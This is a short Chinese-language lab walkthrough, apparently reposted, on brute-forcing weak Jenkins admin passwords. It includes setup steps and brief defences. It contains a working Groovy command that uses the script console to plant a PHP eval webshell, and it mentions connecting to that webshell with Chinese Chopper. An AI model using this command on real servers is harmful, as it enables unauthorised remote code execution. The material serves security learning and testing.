jenkins弱口令漏洞


jenkins弱口令漏洞

一、漏洞描述

通過暴力破解管理控制台,如果爆破成功,可獲得后台管理權限。操作后台,后台可通過腳本命令行功能執行系統命令,如反彈shell等,低權限可以通過創建控制台輸出方式執行命令。

二、漏洞環境搭建

1、 官方下載jenkins-2.50-1.1.noarch.rpm,下載地址: http://mirrors.jenkins.io

2、在redhat6.5上安裝jenkins

2.1、使用rpm安裝

rpm -ivh jenkins-2.50-1.1.noarch.rpm

  

2.2、啟動服務

  

2.3、瀏覽器訪問http://192.168.10.137:8080,如下圖所示需要輸入密碼,密碼文件在如下圖位置

   

2.4查看密碼文件,輸入密碼后進入如下界面,選擇安裝建議的插件

  

2.5、安裝完插件之后,進入如下界面,設置用戶名和密碼

  

2.6、設置完用戶和密碼之后,進入如下界面,點擊如下圖位置,到此為止,jenkins環境搭建成功

  

   

三、漏洞復現

1、瀏覽器訪問http://192.168.10.137:8080

  

2、猜解出密碼,然后登錄,點擊”系統管理”

  

3、選擇如下圖所示

  

4、利用”腳本命令行”上傳webshell,內容如下:

new File("/var/www/html/media.php").write('<?php @eval($_POST[cmd]);?>');

  

5、點擊“運行”,沒有報錯,上傳成功

6、菜刀連接

  

四、漏洞防御

1、增強后台密碼強度

2、后台不對外開放

 

-------------------------------------------------------------------------------

參考鏈接:https://www.secpulse.com/archives/2166.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM